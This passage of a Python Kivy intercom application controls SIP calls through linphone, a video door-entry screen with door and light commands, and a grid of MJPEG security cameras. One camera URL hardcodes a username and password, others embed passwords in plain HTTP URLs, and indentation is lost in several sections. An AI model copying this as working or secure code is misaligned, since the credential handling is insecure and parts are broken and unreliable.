    Idle Initial call state
    IncomingReceived This is a new incoming call
    OutgoingInit An outgoing call is started
    OutgoingProgress An outgoing call is in progress
    OutgoingRinging An outgoing call is ringing at remote end
    OutgoingEarlyMedia An outgoing call is proposed early media
    Connected Connected, the call is answered
    StreamsRunning The media streams are established and running
    Pausing The call is pausing at the initiative of local end
    Paused The call is paused, remote end has accepted the pause
    Resuming The call is being resumed by local end
    Refered The call is being transfered to another party,
    resulting in a new outgoing call to follow immediately
    Error The call encountered an error
    End The call ended normally
    PausedByRemote The call is paused by remote end
    UpdatedByRemote The calls parameters change is requested by remote end,
    used for example when video is added by remote
    IncomingEarlyMedia We are proposing early media to an incoming call
    Updating A call update has been initiated by us
    Released The call object is no more retained by the core
    EarlyUpdatedByRemote
    EarlyUpdating
    """

    def call_state_changed(self, core, call, state, message):
        """linphone callback: accept whitelisted incoming calls, decline the rest."""
        global llamada_entrante
        global llamada_extension
        global llamada_in
        if state == linphone.CallState.IncomingReceived:
            self.llamada = call
            if call.remote_address.as_string_uri_only() in self.whitelist:
                llamada_entrante = call.remote_address.as_string()
                # extract the numeric extension from the caller's SIP address
                llamada_extension = re.search(r'\d+', llamada_entrante).group()
                llamada_extension = int(llamada_extension)
                self.dispatch('on_llamada_entrante')
                llamada_in = True
            else:
                llamada_in = False
                core.decline_call(call, linphone.Reason.Declined)
                self.dispatch('on_llamada_terminada')
                logging.info('LLAMADA ENTRANTE RECHAZADA')
                # leave a chat message telling the whitelisted peer who tried to call
                chat_room = core.get_chat_room_from_uri(self.whitelist[0])
                # NOTE(review): `remote_address_as_string` is the legacy attribute
                # spelling; elsewhere this class uses remote_address.as_string() — confirm
                msg = chat_room.create_message(call.remote_address_as_string + ' intento llamar')
                chat_room.send_chat_message(msg)
        if state == linphone.CallState.End:
            self.dispatch('on_llamada_terminada')
            llamada_in = False
        if state == linphone.CallState.Connected:
            self.dispatch('on_llamada_atendida')

    def enviardtmf(self, *args):
        # NOTE(review): self.current_call is never assigned anywhere in this
        # class; this probably should use self.llamada — confirm before relying on it
        self.current_call.send_dtmf(52)
        logging.info('TONO DTMF ENVIADO')

    def llamada_recibida(self):
        # NOTE(review): tests the enum member itself (always truthy), not the
        # actual call state, so this always returns True as written
        if linphone.CallState.IncomingReceived:
            return True

    # default handlers for the custom events (required by register_event_type)
    def on_registrar(self, *args):
        pass

    def on_noregistrado(self, *args):
        pass

    def on_llamada_entrante(self, *args):
        pass

    def on_llamada_terminada(self, *args):
        pass

    def on_llamada_atendida(self, *args):
        pass

    def on_volumen_altavoz(self, *args):
        """Property observer: propagate the slider volume to the active call."""
        # fix: the assignment below only created a dead local, so the volume
        # never persisted into the module-level `volumen_sistema`
        global volumen_sistema
        volumen_sistema = self.volumen_altavoz
        if llamada_in == True:
            # a call is in progress: update its output volume live
            self.llamada.speaker_volume_gain = volumen_sistema

    def descolgar(self, *args):
        """Answer the pending incoming call with the configured speaker volume."""
        global volumen_sistema
        if llamada_in == True:
            params = self.core.create_call_params(self.llamada)
            self.core.accept_call_with_params(self.llamada, params)
            # set the output volume of the call's audio
            self.llamada.speaker_volume_gain = volumen_sistema

    def colgar(self, *args):
        """Hang up every call in progress."""
        # fix: without `global` the assignment created a dead local and the
        # module-level call flag stayed True after hanging up
        global llamada_in
        llamada_in = False
        self.core.terminate_all_calls()

    def llamar(self, number):
        """Place an outgoing call to extension *number* on the PBX."""
        # None -> fresh default parameters for a brand-new call
        params = self.core.create_call_params(None)
        self.llamada = self.core.invite_with_params('sip:'+str(number)+'@'+str(IPCENTRALITA), params)

    def pausar(self, *args):
        """Toggle hold: pause the call (peer hears the configured file) or resume."""
        self.core.play_file = (str(PATHSOUNDS)+'synth.wav')
        if self.pausa:
            self.pausa = False
            self.core.resume_call(self.llamada)
        else:
            self.core.pause_call(self.llamada)
            self.pausa = True

    def configure_sip_account(self, username, password):
        """Create the SIP proxy config and credentials, and start registration."""
        self.quit_when_registered = True
        self.proxy_cfg = self.core.create_proxy_config()
        self.proxy_cfg.identity_address = self.core.create_address('sip:'+str(username)+'@'+str(IPCENTRALITA))
        self.proxy_cfg.server_addr = 'sip:'+str(IPCENTRALITA)+':5060;transport=udp'
        self.proxy_cfg.register_enabled = True
        self.core.add_proxy_config(self.proxy_cfg)
        auth_info = self.core.create_auth_info(username, None, password, None, None, 'asterix')
        self.core.add_auth_info(auth_info)

    def eliminar_registro(self, username, password):
        # NOTE(review): edit() opens the proxy config for modification and the
        # account is then reconfigured from scratch — confirm this unregisters
        self.proxy_cfg.edit()
        self.configure_sip_account(username, password)

    def activar_registro(self):
        # commit the proxy-config edit opened by eliminar_registro()
        self.proxy_cfg.done()

    def mute(self):
        """Silence the ringer."""
        self.core.ring_level = 0

    def un_mute(self):
        """Restore the ringer to the saved module-level level."""
        self.core.ring_level = nivel_sonido_telefono

    def registro(self, *args):
        """Return True when the SIP account is registered."""
        return bool(self.registrada)

    # linphone's main loop must be pumped periodically; we do it ~11x per second
    def run(self, *args):
        self.core.iterate()

    def start(self):
        """Begin pumping the linphone core via the Kivy clock."""
        Clock.schedule_interval(self.run, 1 / 11)
class MjpegCCtv(ButtonBehavior,Image):
    """Clickable Kivy Image fed by an MJPEG HTTP stream (used for the
    video-door-entry camera)."""
    url = StringProperty()
    # static fallback picture shown while there is no video
    cctv_no = Image( source='./imaxes/novideo600.png')

    def on_press(self, *args):
        pass

    def start(self):
        """Spawn the reader thread and schedule texture updates."""
        self.quit = False
        self._queue = deque()  # NOTE(review): never consumed; kept for compatibility
        # fix: the frame buffer is initialised BEFORE the thread starts; the
        # original set it to None AFTER Thread.start(), which could clobber
        # the thread's first published frame
        self._image_buffer = None
        self._thread = threading.Thread(target=self.read_stream)
        self._thread.start()
        Clock.schedule_interval(self.update_image, 1 / 30)

    def stop(self):
        self.quit = True
        Clock.unschedule(self.update_image)

    def read_queue(self):
        pass

    def read_stream(self):
        """Background thread: pull MJPEG data and publish the latest frame."""
        try:
            self._image_buffer = self.cctv_no
            stream = urllib.urlopen(self.url)
        except Exception:
            # connection failed: leave the "no video" frame up and stop
            self._image_buffer = self.cctv_no
            self.quit = True
            # fix: explicit return; previously fell through into the read loop
            # (skipped only because self.quit was already True)
            return
        bytes = ''
        while not self.quit:
            bytes += stream.read(1024)
            a = bytes.find('\xff\xd8')  # JPEG start-of-image marker
            b = bytes.find('\xff\xd9')  # JPEG end-of-image marker
            # both markers present -> we hold one complete JPEG frame
            if a != -1 and b != -1:
                jpg = bytes[a:b + 2]
                bytes = bytes[b + 2:]
                data = io.BytesIO(jpg)
                im = CoreImage(data, ext="jpeg", nocache=True, scale=0.5)
                self._image_buffer = im
        return

    def update_image(self, *args):
        """Clock callback: push the newest frame (if any) to the texture."""
        im = None
        im = self._image_buffer
        self._image_buffer = None
        if im is not None:
            self.texture = im.texture
            self.texture_size = im.texture.size
#CONTROL DE VIDEOPORTERO
class Videoportero_screen(Screen):
    """Screen controlling the IP video door entry: live camera view, talk
    (SIP call to the outdoor unit), door opener, light, mute and volume
    sliders.  Relies on the module-level `telefono1` Phone instance and the
    llamada_in / volumen_* globals.
    """
    def __init__(self, **kwargs):
        # super() inherits all Screen attributes
        super( Videoportero_screen, self).__init__(**kwargs)
        global volumen_microfono
        # NOTE(review): no module-level `volumen_altavoz` variable exists; this
        # global statement only matters if something assigns it — confirm intent
        global volumen_altavoz
        IPVIDEOPORTEROEXT=config.get('videoportero', 'ipvideoportero')
        PORTOVIDEOPORTERO=config.get('videoportero', 'puerto')
        # root layout, fixed 800x480, with a full-screen background image
        capa= BoxLayout(size_hint=(None,None),size=(800, 480),orientation='vertical')
        with capa.canvas.before:
            rect = Rectangle(source=str(PATH)+'fondo41.png',size=capa.size, pos=capa.pos)
        capa.opacity=1
        # must be a FloatLayout for the BotonLed widget to work
        capa2= FloatLayout(size_hint=(None,None),size=(800, 440),pos=(0,0))
        capa1=RelativeLayout(pos_hint_x=None,size_hint_x=None,size=(800, 40),pos=(0,440))
        self.capacamara=BoxLayout(size_hint=(None,None),size=(490, 400),pos=(5,60))
        with capa1.canvas.before:
            Color(0.15,0.15,15,0.1)
            self.r1=Rectangle(size=capa1.size, pos=capa1.pos)
        atras=BotonI( imagen=str(PATH)+'casa_white.png',size_hint_x=0.1,pos=(750,0),size=(35,35),trasparencia=0.2)
        self.imagencon = Image( source=str(PATH)+'load3.gif',size_hint_x=None,pos=(10,0),opacity=0.2)
        self.imagencon.anim_delay=0
        self.textocon = Label(text='Conectando',bold = True,font_size=18,color=[1,1,1,1],size_hint_x=None,pos=(90,0))
        reloj=DigitalClock(size_hint_x=0.3, pos=(500,0),font_size=24, style='cool', halign='right', valign='middle')
        capa1.add_widget(self.imagencon)
        capa1.add_widget(self.textocon)
        capa1.add_widget(reloj)
        capa1.add_widget(atras)
        # top bar: connection status, clock and home button
        capa.add_widget(capa1)
        self.CAM1=BotonLedToggle(pos=(600,300),size=(200,100),imagen=str(PATH)+'camara_white.png',text='',opacity=0.7)
        self.ABRIR=BotonLed(pos=(600,200),size=(200,100),imagen=str(PATH)+'chave2.png',text='',opacity=0.7,group='zona')
        self.LUZ=BotonLed(pos=(600,100),size=(200,100),imagen=str(PATH)+'luz_white.png',text='',opacity=0.7,group='zona')
        self.MUTE=BotonLedToggle(pos=(600,0),size=(200,100),imagen=str(PATH)+'mute_white.png',text='',opacity=0.7,group='zona',state="down")
        self.HABLAR=BotonColor(pos=(500,0),size=(100,400),imagen=str(PATH)+'micro_white.png',text=' ',opacity=0.4)
        capa2.add_widget(self.MUTE)
        capa2.add_widget(self.LUZ)
        capa2.add_widget(self.ABRIR)
        capa2.add_widget(self.HABLAR)
        capa2.add_widget(self.CAM1)
        self.camaraip= MjpegCCtv(url='http://videoportero:proval@'+str(IPVIDEOPORTEROEXT)+':'+str(PORTOVIDEOPORTERO)+'/?action=stream')
        self.ImagenVideo = Image( source=str(PATH)+'novideoip.png')
        # placeholder shown until the camera toggle starts the live stream
        self.micamara=self.ImagenVideo
        self.capacamara.add_widget(self.micamara)
        capa2.add_widget(self.capacamara)
        capacontroles=BoxLayout(orientation='horizontal',size_hint=(None,None),size=(500, 40),pos=(0,0))
        self.Imic=Image( source=str(PATH)+'Mic32.png',size_hint=(None,1),pos=(0,0))
        self.volumeMic = Slider(value=volumen_microfono,pos=(0,40),value_track=True,
                        value_track_color=[0, 0, 1, 0.5],
                        value_track_width=3,border_horizontal= [0, 10, 0, 10],cursor_size=(16,20),
                        orientation='horizontal',min=0, max =15)
        self.volumeMic.bind(value=self.volumen_mic)
        self.Ialtavoz=Image( source=str(PATH)+'speaker32.png',size_hint=(None,1),pos=(0,0))
        self.volumeAltavoz = Slider(value=volumen_microfono,pos=(0,40),value_track=True,
                        value_track_color=[0, 0, 1, 0.5],value_track_width=3,
                        border_horizontal= [0, 10, 0, 10],cursor_size=(16,20),
                        orientation='horizontal',min=0, max =100)
        self.volumeAltavoz.bind(value=self.volumen_altavoz)
        capacontroles.add_widget(self.Imic)
        capacontroles.add_widget(self.volumeMic)
        capacontroles.add_widget(self.Ialtavoz)
        capacontroles.add_widget(self.volumeAltavoz)
        capa2.add_widget(capacontroles)
        # the rest of the screen
        capa.add_widget(capa2)
        telefono1.start()
        # react to the custom events defined on the Phone class
        telefono1.bind(on_registrar=self.registrado)
        telefono1.bind(on_noregistrado=self.noregistrado)
        # attach the layer holding every created widget to this Screen
        self.add_widget(capa)
        atras.bind(on_press=self.cambio)
        self.CAM1.bind(on_press=self.controlcamara)
        self.MUTE.bind(on_press=self.control_mute)
        self.HABLAR.bind(on_release=self.descolgar)
        self.LUZ.bind(on_press=self.control_luz)
        self.ABRIR.bind(on_press=self.abrir)
        self.ABRIR.bind(on_release=self.cerrar)
        # UDP command client for the outdoor unit (door, light, sounds)
        self.comando=EnviaComando(str(IPVIDEOPORTEROEXT),EXT_VIDEOPORTERO)
    def volumen_mic(self,*args):
        """Slider callback: apply the microphone gain to linphone."""
        telefono1.core.mic_gain_db= self.volumeMic.value
        # NOTE(review): missing `global volumen_microfono` — this assignment
        # only creates a local, so the setting never persists
        volumen_microfono=self.volumeMic.value
    def volumen_altavoz(self,*args):
        """Slider callback: apply the ringer/speaker level to linphone."""
        telefono1.core.ring_level= int(self.volumeAltavoz.value)
        # NOTE(review): missing `global volumen_altavoz` — local-only assignment
        volumen_altavoz=self.volumeAltavoz.value
    def descolgar(self,*args):
        """Answer (TALK pressed) or hang up (TALK released) the door call."""
        global llamada_in
        # case 1: we entered this screen because someone rang the doorbell
        if llamada_in:
            if self.HABLAR.state=="down":
                telefono1.descolgar()
            else:
                telefono1.colgar()
                self.desactivacamara()
                # go back to the screen named OLLOSIP
                self.manager.current = SCREEN_ACTIVA
        # case 2: entered from the main menu with no call pending, so
        # pressing TALK places an outgoing call to the door unit
        else:
            if self.HABLAR.state=="down":
                telefono1.llamar(EXT_VIDEOPORTERO)
            else:
                telefono1.colgar()
                self.desactivacamara()
    def control_mute(self,*args):
        """Toggle the ringer mute and swap the button icon accordingly."""
        if self.MUTE.state=='normal':
            self.MUTE.imaxe=str(PATH)+'mute_off.png'
            telefono1.mute()
            # NOTE(review): local-only assignment; does not change any global
            volumen_altavoz=0
        else:
            telefono1.un_mute()
            self.MUTE.imaxe=str(PATH)+'mute_white.png'
        pass
    def control_luz(self,*args):
        # tell the outdoor unit to switch on its light
        self.comando.envia('ENCIENDE LUZ')
    def abrir(self,*args):
        self.comando.envia('ABRE PUERTA')
    def cerrar(self,*args):
        self.comando.envia('CIERRA PUERTA')
    def controlcamara(self,*args):
        """Camera toggle button: show or hide the live stream."""
        if self.CAM1.state=="down":
            self.activacamara()
        else:
            self.desactivacamara()
    def activacamara(self,*args):
        """Swap the placeholder image for the live MJPEG stream."""
        self.CAM1.state="down"
        self.capacamara.remove_widget(self.micamara)
        self.camaraip.start()
        self.micamara=self.camaraip
        self.capacamara.add_widget(self.micamara)
    def desactivacamara(self,*args):
        """Stop the stream and restore the placeholder image."""
        self.CAM1.state="normal"
        self.capacamara.remove_widget(self.micamara)
        self.camaraip.stop()
        self.micamara=self.ImagenVideo
        self.capacamara.add_widget(self.micamara)
    def registrado(self,*args):
        # SIP registration OK: green LED plus "Conectado"
        self.imagencon.source=str(PATH)+'ledverde18.png'
        self.textocon.text='Conectado'
    def noregistrado(self,*args):
        # not registered: spinner plus "Conectando"
        self.imagencon.source=str(PATH)+'load3.gif'
        self.textocon.text='Conectando'
    def on_leave(self):
        """ScreenManager hook (leaving): ensure mic off, call ended, door
        closed and camera stopped."""
        self.HABLAR.state="normal"
        telefono1.colgar()
        self.comando.envia('CIERRA PUERTA')
        self.CAM1.state="normal"
        self.camaraip.stop()
    def on_enter(self):
        """ScreenManager hook (entering): if we arrived because of an
        incoming call, start the camera right away."""
        global llamada_entrante
        global llamada_in
        if llamada_in:
            self.activacamara()
    def cambio(self,*args):
        # home button: go to the screen named OLLOSIP
        self.manager.current = 'OLLOSIP'
#CONTROL DE VIDEOPORTERO
class Camara_screen(Screen):
    """Full-screen (zoom) view of a single CCTV camera.

    `url` and `nombre` are assigned from Cctv_screen before switching here;
    tapping the image (kv on_press) returns to the CCTV grid screen.
    """
    url=StringProperty()
    nombre=StringProperty('')
    Builder.load_string("""
<Camara_screen>:
    on_enter:self.ids.camzoom.start()
    on_leave:self.ids.camzoom.stop()
    CamaraCctv:
        id:camzoom
        nombre:root.nombre#app.sm.get_screen('CCTV').camara_nombre
        ##accedemos a la variable camara_zoon de la clase Cctv_screen donde asignamos
        #la camara que queremos ver en zoom en esta clase
        ##para ello usamos el metodo get_screen para acceder a otra clase screen desde esta
        url: root.url
        on_press:root.manager.current= 'CCTV'
""")
class Cctv_screen(Screen):
#declaramos una lista property donde tendremos las url de las camaras de seguridad.
#En el caso de que cambiemos la ip automaticamente se actualizara en nuestro codigo
#kv mas abajo
numero_de_camaras=NumericProperty(4)
lista_camaras=ListProperty(['','','','','','','','','',''])
uno=''
camara_url= StringProperty()
camara_nombre= StringProperty()
ocultar_menu=BooleanProperty(True)
nomecam2= StringProperty()
nomecam3= StringProperty()
nomecam4= StringProperty()
nomecam5= StringProperty()
nomecam6= StringProperty()
nomecam7= StringProperty()
nomecam8= StringProperty()
nomecam9= StringProperty()
    def on_config(self):
        """Placeholder for config-change handling (currently unused)."""
        pass
    def configcamaras(self,config,none,section,key,value):
        """Settings-panel callback: pick up a changed camera name.

        NOTE(review): only 'nomecam1' in section 'camaras' is handled; every
        other key is silently ignored — confirm whether that is intended.
        """
        if (section == "camaras"):
            if key=='nomecam1':
                self.nomecam1=value
# creamos un diccionario llamado camara donde almacenamos la url y el nombre
#de la camara que queramos poner a pantalla
#completa cuando pulsemos en una de ellas
def __init__(self, **kwargs):
#con super heredamos de la clase screen todos los atributos de esta
super( Cctv_screen, self).__init__(**kwargs)
self.nomecam1= StringProperty()
self.configuracion_camaras()
self.lista_camaras[1]='http://'+str(self.usercam1)+':'+str(self.clave1)+'@'+str(self.ipcamara1)+':'+str(self.porto1)+'/video'
self.lista_camaras[2]='http://'+str(self.usercam2)+':'+str(self.clave2)+'@'+str(self.ipcamara2)+':'+str(self.porto2)+'/video'
self.lista_camaras[3]='http://'+str(self.usercam3)+':'+str(self.clave3)+'@'+str(self.ipcamara3)+':'+str(self.porto3)+'/video'
self.lista_camaras[4]='http://'+str(self.usercam4)+':'+str(self.clave4)+'@'+str(self.ipcamara4)+':'+str(self.porto4)+'/video'
self.lista_camaras[5]='http://'+str(self.usercam5)+':'+str(self.clave5)+'@'+str(self.ipcamara5)+':'+str(self.porto5)+'/video'
self.lista_camaras[6]='http://'+str(self.usercam6)+':'+str(self.clave6)+'@'+str(self.ipcamara6)+':'+str(self.porto6)+'/video'
self.lista_camaras[7]='http://'+str(self.usercam7)+':'+str(self.clave7)+'@'+str(self.ipcamara7)+':'+str(self.porto7)+'/video'
self.lista_camaras[8]='http://'+str(self.usercam8)+':'+str(self.clave8)+'@'+str(self.ipcamara8)+':'+str(self.porto8)+'/video'
self.lista_camaras[9]='http://'+str(self.usercam9)+':'+str(self.clave9)+'@'+str(self.ipcamara9)+':'+str(self.porto9)+'/video'
    def on_nomecam1(self,*args):
        # Observer hook for nomecam1; nothing to do.
        # NOTE(review): unlike nomecam2..9, nomecam1 is not declared as a
        # class-level StringProperty here — confirm this handler ever fires.
        pass
def configuracion_camaras(self,*args):
#lemos de novo o arquivo por se houbo algun cambio na configuracion
config.read('ollosip.ini')
self.ipcamara1=config.get('camaras', 'ipcam1')
self.porto1 = config.get('camaras', 'porto1')
self.usercam1 = config.get('camaras', 'usercam1')
self.clave1 = config.get('camaras', 'clave1')
self.oncam1 = config.get('camaras', 'oncam1')
self.nomecam1=config.get('camaras', 'nomecam1')
#print(self.nomecam1)
self.ipcamara2=config.get('camaras', 'ipcam2')
self.porto2 = config.get('camaras', 'porto2')
self.usercam2 = config.get('camaras', 'usercam2')
self.clave2 = config.get('camaras', 'clave2')
self.oncam2 = config.get('camaras', 'oncam2')
self.nomecam2=config.get('camaras', 'nomecam2')
self.ipcamara3=config.get('camaras', 'ipcam3')
self.porto3 = config.get('camaras', 'porto3')
self.usercam3 = config.get('camaras', 'usercam3')
self.clave3 = config.get('camaras', 'clave3')
self.oncam3 = config.get('camaras', 'oncam3')
self.nomecam3=config.get('camaras', 'nomecam3')
self.ipcamara4=config.get('camaras', 'ipcam4')
self.porto4 = config.get('camaras', 'porto4')
self.usercam4 = config.get('camaras', 'usercam4')
self.clave4 = config.get('camaras', 'clave4')
self.oncam4 = config.get('camaras', 'oncam4')
self.nomecam4=config.get('camaras', 'nomecam4')
self.ipcamara5=config.get('camaras', 'ipcam5')
self.porto5 = config.get('camaras', 'porto5')
self.usercam5 = config.get('camaras', 'usercam5')
self.clave5 = config.get('camaras', 'clave5')
self.oncam5 = config.get('camaras', 'oncam5')
self.nomecam5=config.get('camaras', 'nomecam5')
self.ipcamara6=config.get('camaras', 'ipcam6')
self.porto6 = config.get('camaras', 'porto6')
self.usercam6 = config.get('camaras', 'usercam6')
self.clave6 = config.get('camaras', 'clave6')
self.oncam6 = config.get('camaras', 'oncam6')
self.nomecam6=config.get('camaras', 'nomecam6')
self.ipcamara7=config.get('camaras', 'ipcam7')
self.porto7 = config.get('camaras', 'porto7')
self.usercam7 = config.get('camaras', 'usercam7')
self.clave7 = config.get('camaras', 'clave7')
self.oncam7 = config.get('camaras', 'oncam7')
self.nomecam7=config.get('camaras', 'nomecam7')
self.ipcamara8=config.get('camaras', 'ipcam8')
self.porto8 = config.get('camaras', 'porto8')
self.usercam8 = config.get('camaras', 'usercam8')
self.clave8 = config.get('camaras', 'clave8')
self.oncam8 = config.get('camaras', 'oncam8')
self.nomecam8=config.get('camaras', 'nomecam8')
self.ipcamara9=config.get('camaras', 'ipcam9')
self.porto9 = config.get('camaras', 'porto9')
self.usercam9 = config.get('camaras', 'usercam9')
self.clave9 = config.get('camaras', 'clave9')
self.oncam9 = config.get('camaras', 'oncam9')
self.nomecam9=config.get('camaras', 'nomecam9')
    def on_numero_de_camaras(self,*args):
        """Property observer: rebuild the grid when switching 4 <-> 9 view,
        stopping the streams of the layout being replaced first."""
        if self.numero_de_camaras==4:
            self.camaras_9off()
            self.camaras_4()
        else:
            self.camaras_4off()
            self.camaras_9()
        pass
    def on_enter(self):
        """ScreenManager hook: reload camera config and build the grid."""
        self.configuracion_camaras()
        if self.numero_de_camaras==4:
            # NOTE(review): `self` is passed as an extra positional argument and
            # lands in *args — harmless but probably unintended
            self.camaras_4(self)
        else:
            self.camaras_9(self)
    def on_leave(self):
        """ScreenManager hook: stop the camera streams when leaving."""
        if self.numero_de_camaras==4:
            self.camaras_4off()
        else:
            self.camaras_9off()
def camaras_4(self,*args):
self.ids.camarascctv.clear_widgets()
self.ids.camarascctv.cols=2
self.ids.camarascctv.row=2
self.camara1=CamaraCctv(url=self.lista_camaras[1],nombre=self.nomecam1)
self.ids.camarascctv.add_widget(self.camara1)
self.camara1.bind(on_press=partial(self.camara_zoom,self.camara1.nombre,self.camara1.url))
self.camara1.start()
self.camara2=CamaraCctv(url=self.lista_camaras[2],nombre=self.nomecam2)
self.ids.camarascctv.add_widget(self.camara2)
self.camara2.bind(on_press=partial(self.camara_zoom,self.camara2.nombre,self.camara2.url))
self.camara3=CamaraCctv(url=self.lista_camaras[3],nombre=self.nomecam3)
self.ids.camarascctv.add_widget(self.camara3)
self.camara3.bind(on_press=partial(self.camara_zoom,self.camara3.nombre,self.camara3.url))
self.camara4=CamaraCctv(url=self.lista_camaras[4],nombre=self.nomecam4)
self.ids.camarascctv.add_widget(self.camara4)
self.camara4.bind(on_press=partial(self.camara_zoom,self.camara4.nombre,self.camara4.url))
self.camaras_4on()
def camaras_9(self, *args):
    """Build the 3x3 camera grid: create nine CamaraCctv widgets from the
    configured URLs/names, wire their zoom callbacks and start streaming.

    Fix vs. the original: ``row`` was a typo — GridLayout's real property
    is ``rows``. The nine copy-pasted widget blocks were folded into a loop.
    """
    grid = self.ids.camarascctv
    grid.clear_widgets()
    grid.cols = 3
    grid.rows = 3  # was ``row`` (no-op attribute) in the original
    for i in range(1, 10):
        cam = CamaraCctv(url=self.lista_camaras[i],
                         nombre=getattr(self, 'nomecam%d' % i))
        # Keep the self.camaraN attributes: camaras_9on/_9off rely on them.
        setattr(self, 'camara%d' % i, cam)
        grid.add_widget(cam)
        cam.bind(on_press=partial(self.camara_zoom, cam.nombre, cam.url))
    self.camaras_9on()
def camaras_4on(self, *args):
    """Start streaming on the four cameras of the 2x2 layout."""
    for indice in range(1, 5):
        getattr(self, 'camara%d' % indice).start()
def camaras_9on(self, *args):
    """Start streaming on the nine cameras of the 3x3 layout."""
    for indice in range(1, 10):
        getattr(self, 'camara%d' % indice).start()
def camaras_4off(self, *args):
    """Stop streaming on the four cameras of the 2x2 layout."""
    for indice in range(1, 5):
        getattr(self, 'camara%d' % indice).stop()
def camaras_9off(self, *args):
    """Stop streaming on the nine cameras of the 3x3 layout."""
    for indice in range(1, 10):
        getattr(self, 'camara%d' % indice).stop()
def camara_zoom(self, nome, url, comodin):
    """Open the single-camera view: push the camera's name and url into
    the VIDEOCAMARA screen's properties and switch to it.

    ``comodin`` receives the widget instance appended by partial() in the
    on_press binding; it is intentionally unused.
    """
    destino = self.manager.get_screen('VIDEOCAMARA')
    destino.url = url
    destino.nombre = nome
    self.manager.current = 'VIDEOCAMARA'
def graba(self, *args):
    # Recording feature: placeholder, not implemented yet (see the
    # commented-out on_press bindings in the kv menu below).
    pass
def animate(self, instance):
    """Toggle the slide-in side menu by animating ``instance``'s
    size_hint; ``self.ocultar_menu`` tracks the current state.

    ``+=`` on Animation chains sequentially, ``&=`` runs in parallel.
    """
    if self.ocultar_menu:
        anim = Animation(size_hint=(0.3, 1), t='out_expo')  # slide open
    else:
        anim = Animation(size_hint=(0, 1), t='out_expo')    # collapse
    self.ocultar_menu = not self.ocultar_menu
    anim.start(instance)
Builder.load_string("""
<ImageButton@ButtonBehavior+Image>
allow_stretch: False
pos_hint: {'center_x': 0.1, 'center_y': 0.5}
size: self.texture_size
<Cctv_screen>:
canvas.before:
Rectangle:
pos: self.pos
size: self.size
source:'./imaxes/fondo12.png'
BoxLayout:
id:camaras
orientation: 'vertical'
##spacing: 5
BoxLayout:
size_hint:1,0.08
orientation: 'vertical'
canvas.before:
Color:
rgba:0.1,0.1,0.1,0.5
Rectangle:
pos: self.pos
size: self.size
BoxLayout:
id:botones
orientation:'horizontal'
size_hint:0.3,0.2
pos_hint:{'right': 1}
ImageButton:
size_hint_y:0.7
opacity:0.8
source:'./imaxes/cctv4_white.png'## if self.state=="down" else 'playlist_add_black.png'
on_press: root.numero_de_camaras=4
ImageButton:
size_hint_y:0.7
opacity:0.8
source:'./imaxes/cctv9_white.png'## if self.state=="down" else 'playlist_add_black.png'
on_press: root.numero_de_camaras=9
ImageButton:
size_hint_y:0.7
opacity:0.6
source:'./imaxes/casa_white.png'## if self.state=="down" else 'playlist_add_black.png'
on_press: root.manager.current='OLLOSIP'#root.cambio()
ImageButton:
opacity:0.6
source:'./imaxes/menu_white.png'## if self.state=="down" else 'playlist_add_black.png'
#neste punto chammos o menu de configuracion das opcions das camaras(pendente de desenrolo)
#on_press: root.animate(root.ids.menu)
GridLayout:
id:camarascctv
size_hint_y:0.9
cols:2
row:2
disabled:False if root.ocultar_menu==True else True
#comprobamos si o menu desplegable esta activado, si e asi bloqueamos
#todos os widgets que colgan desta capa gridlayout
BoxLayout:
id:menu
orientation:'vertical'
size_hint:0,1
canvas.before:
Color:
rgba:0.1,0.1,0.05,0.7
Rectangle:
pos: self.pos
size: self.size
ScrollView:
BoxLayout:
size_hint:1,None#dp(10) ##separacion en pixeles entre os elementos que componen o menu
size:100,10
height:800
orientation:'vertical'
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
Label:
text:'pruebas'
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
""")
class Principal_screen(Screen):
def __init__(self, **kwargs):
#con super heredamos de la clase screen todos los atributos de esta
super( Principal_screen, self).__init__(**kwargs)
SCREEN_ACTIVA= 'OLLOSIP'
self.size=(800,480)
self.imagenfondo = Image(source=str(PATH)+'fondo5.jpg')
capa_fondo=FloatLayout(size_hint=(1,1))
capa_botones= FloatLayout(size_hint=(None,None),size=(800, 460),pos=(0,0))
capa_info=RelativeLayout(size_hint=(None,None),size=(800, 40),pos=(0,440))
with capa_info.canvas.before:
Color(0,0,1,1)
rect = Rectangle(size=capa_info.size, pos=capa_info.pos)
capa_test=BoxLayout(size_hint=(None,None),size=(200,20),pos=(0,19))
b1=Button(size_hint=(0.5,1),text='B1')
b2=Button(size_hint=(0.5,1),text='B2')
capa_test.add_widget(b1)
capa_test.add_widget(b2)
capa_test2=BoxLayout(size_hint=(None,None),size=(200,20))
b3=Button(size_hint=(0.5,1),text='B3')
b4=Button(size_hint=(0.5,1),text='B4')
capa_test2.add_widget(b3)
capa_test2.add_widget(b4)
reloj=DigitalClock(size_hint_x=0.3, pos=(510,0),font_size=34, style='cool', halign='right', valign='middle')
boton_settings= IconButton(pos=(760,0),imagen=str(PATH)+'menu_white.png',size=(40,40))
boton_megafonia= IconButton(pos=(50,120),imagen=str(PATH)+'megafonia90.png',texto='MEGAFONIA' ,size=(140,140))
boton_cctv= IconButton(pos=(320,220),imagen=str(PATH)+'cctv90.png',texto='CCTV' ,size=(140,140))
boton_videoip= IconButton(pos=(610,120),imagen=str(PATH)+'porteroip90.png',texto='VIDEOIP' ,size=(140,140))
#OJO SI EL NOMBRE DE LA IMAGEN
#OJO SI EL NOMBRE DE LA IMAGEN
#EMPIEZA POR V DA ERROR AL LEERLA, HABRa QUE ESTUDIAR EL PORQUe
capa_botones.add_widget(boton_videoip)
capa_botones.add_widget(boton_megafonia)
capa_botones.add_widget(boton_cctv)
capa_info.add_widget(boton_settings)
capa_info.add_widget(reloj)
capa_fondo.opacity=1
capa_botones.opacity=1
capa_info.opacity=1
